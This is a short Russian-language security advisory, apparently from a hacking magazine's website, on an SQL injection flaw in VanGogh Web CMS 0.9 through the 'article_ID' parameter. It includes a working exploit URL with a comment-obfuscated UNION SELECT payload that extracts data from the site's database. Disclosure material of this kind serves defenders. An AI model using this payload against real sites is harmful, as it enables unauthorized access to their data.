SQL-инъекция в VanGogh Web CMS

Рекомендуем почитать:

Хакер #312. Minecraft по-хакерски

Программа: VanGogh Web CMS 0.9

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «article_ID» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[Target]/[vangogh_path]/index.php?article_ID= [SQL Injection]&get_action=article&section=5

http://[Target]/[vangogh_path]/index.php?article_ID=8/**/AND/**/1=2/* */UNION/**/SELECT/**/1,concat(id,0x3a,title),3/**/FROM/*
*/section&get_action=article&section=5

SQL-инъекция в VanGogh Web CMS

Хакер #312. Minecraft по-хакерски

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Охота на «Даркулу». Заглядываем за кулисы глобального фишинга

В кроличьей норе. Штурмуем отладочную консоль «Яндекс Станции»

HTB UnderPass. Используем Mosh для получения сессии на сервере

Уроки форензики. Создаем профиль Volatility для анализа инцидентов в Linux

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Разработчик Curl сравнил ИИ-отчеты об уязвимостях с DDoS-атакой

У компании Marks & Spencer похитили информацию о клиентах

Атаки ClickFix теперь применяют против пользователей Linux

Google заплатит 1,375 млрд долларов за несанкционированный трекинг и сбор биометрических данных

В даркнете продают 89 млн записей пользователей Steam с кодами 2ФА. Компания Twilio отрицает взлом